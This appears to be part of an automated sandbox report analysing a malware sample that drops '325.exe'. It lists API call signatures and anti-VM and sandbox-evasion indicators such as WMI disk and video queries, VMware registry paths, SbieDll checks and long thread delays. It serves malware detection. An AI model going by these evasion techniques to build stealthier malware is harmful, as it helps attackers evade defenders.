                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/uNote.csHigh entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeFile created: C:\Users\user\AppData\Roaming\325.exeJump to dropped file
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014008B0A0 GetForegroundWindow,IsWindowVisible,IsIconic,ShowWindow,0_2_000000014008B0A0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400881E0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,0_2_00000001400881E0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014008B280 GetWindowThreadProcessId,GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,BringWindowToTop,0_2_000000014008B280
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014005E330 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,CreateDCW,GetDC,GetPixel,DeleteDC,ReleaseDC,0_2_000000014005E330
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140075850 SetDlgItemTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetMenu,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus,0_2_0000000140075850
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140075850 SetDlgItemTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetMenu,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus,0_2_0000000140075850
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140044A00 IsDlgButtonChecked,IsWindowVisible,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,IsDlgButtonChecked,0_2_0000000140044A00
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140071A10 GetWindowLongW,GetWindowLongW,SetWindowPos,EnableWindow,GetWindowRect,GetClientRect,MulDiv,MulDiv,GetWindowRect,GetWindowRect,GetClientRect,MulDiv,MulDiv,GetWindowRect,IsWindow,SetParent,SetWindowLongPtrW,SetParent,IsWindowVisible,IsIconic,SetWindowLongW,SetWindowLongW,SetWindowPos,InvalidateRect,0_2_0000000140071A10
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400C2BE0 IsIconic,0_2_00000001400C2BE0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140040D29 IsZoomed,IsIconic,0_2_0000000140040D29
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140079D90 IsDlgButtonChecked,GetWindowLongW,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,IsDlgButtonChecked,GetWindowLongW,ShowWindow,EnableWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,SetFocus,IsDlgButtonChecked,SetFocus,MapWindowPoints,InvalidateRect,0_2_0000000140079D90
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion:

                    barindex
                    Yara detected AntiVM3Show sources
                    Source: Yara matchFile source: 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 325.exe PID: 4796, type: MEMORY
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\AppData\Roaming\325.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\AppData\Roaming\325.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\AppData\Roaming\325.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeWindow / User API: threadDelayed 440Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeWindow / User API: threadDelayed 7193Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Users\user\AppData\Roaming\325.exe TID: 3868Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exe TID: 5044Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exe TID: 5644Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exe TID: 3348Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140013FF0 GetKeyboardLayout followed by cmp: cmp ecx, 0ah and CTI: jl 0000000140014030h country: Spanish (es)0_2_0000000140013FF0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140014380 GetKeyboardLayout followed by cmp: cmp dl, 00000019h and CTI: ja 00000001400144F3h country: Russian (ru)0_2_0000000140014380
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400055F0 GetKeyboardLayout followed by cmp: cmp ebx, 0ah and CTI: jl 0000000140005720h country: Spanish (es)0_2_00000001400055F0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014000DAA0 GetKeyboardLayout followed by cmp: cmp word ptr [r14+02h], bp and CTI: jne 000000014000DBAAh0_2_000000014000DAA0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140045CF0 GetLocalTime followed by cmp: cmp word ptr [rbx], ax and CTI: je 0000000140046041h0_2_0000000140045CF0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140045CF0 GetLocalTime followed by cmp: cmp dx, ax and CTI: je 0000000140045F13h0_2_0000000140045CF0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140087A90 GetFileAttributesW,FindFirstFileW,FindClose,0_2_0000000140087A90
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140087B90 FindFirstFileW,FindClose,FindFirstFileW,FindClose,0_2_0000000140087B90
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D080 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_000000014004D080
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140062320 GetFileAttributesW,FindFirstFileW,FindClose,0_2_0000000140062320
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400C2390 FindFirstFileW,0_2_00000001400C2390
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D405 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_000000014004D405
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D40F SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_000000014004D40F
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D419 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_000000014004D419
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D423 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_000000014004D423
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D44D SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_000000014004D44D
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D478 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_000000014004D478
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D4A0 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_000000014004D4A0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D4BE SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_000000014004D4BE
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D4DF SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_000000014004D4DF
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D500 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_000000014004D500
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D792 FindFirstFileW,GetLastError,0_2_000000014004D792
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D7E0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,0_2_000000014004D7E0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004D990 SystemTimeToFileTime,LocalFileTimeToFileTime,GetLastError,GetSystemTimeAsFileTime,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,CreateFileW,GetLastError,SetFileTime,GetLastError,CloseHandle,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,0_2_000000014004D990
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140061A30 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,CopyFileW,GetLastError,FindNextFileW,FindClose,0_2_0000000140061A30
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004CAE0 SetLastError,DeleteFileW,GetLastError,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,DeleteFileW,GetLastError,FindNextFileW,FindClose,0_2_000000014004CAE0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140032DC0 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_0000000140032DC0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004DFA0 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,0_2_000000014004DFA0
                    Source: C:\Users\user\AppData\Roaming\325.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmpBinary or memory string: vmware
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                    Source: kS2dqbsDwD.exeBinary or memory string: Hyper-V RAW
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmpBinary or memory string: VMWARE
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                    Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                    Source: 325.exe, 0000000E.00000002.362868644.0000000000EAF000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400B12B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00000001400B12B0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140060290 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetOpenUrlW,FreeLibrary,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,FreeLibrary,DeleteFileW,FreeLibrary,0_2_0000000140060290
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400C2648 GetStringTypeW,GetProcessHeap,IsValidCodePage,0_2_00000001400C2648
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400BC054 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00000001400BC054
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400B12B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00000001400B12B0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400C24B8 SetUnhandledExceptionFilter,0_2_00000001400C24B8
                    Source: C:\Users\user\AppData\Roaming\325.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140036D50 CreateProcessW,CloseHandle,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetLastError,FormatMessageW,0_2_0000000140036D50
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140010F60 GetCurrentThreadId,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetAsyncKeyState,keybd_event,GetAsyncKeyState,keybd_event,GetAsyncKeyState,0_2_0000000140010F60
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140062600 mouse_event,0_2_0000000140062600
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess created: C:\Users\user\AppData\Roaming\325.exe {path}Jump to behavior
                    Source: kS2dqbsDwD.exeBinary or memory string: Program Manager
                    Source: kS2dqbsDwD.exeBinary or memory string: Shell_TrayWnd
                    Source: kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmpBinary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowahk_idpidgroupclass%s%uProgram ManagerError text not found (please report)Q\E{0,DEFINEUTF16)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 8 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory"
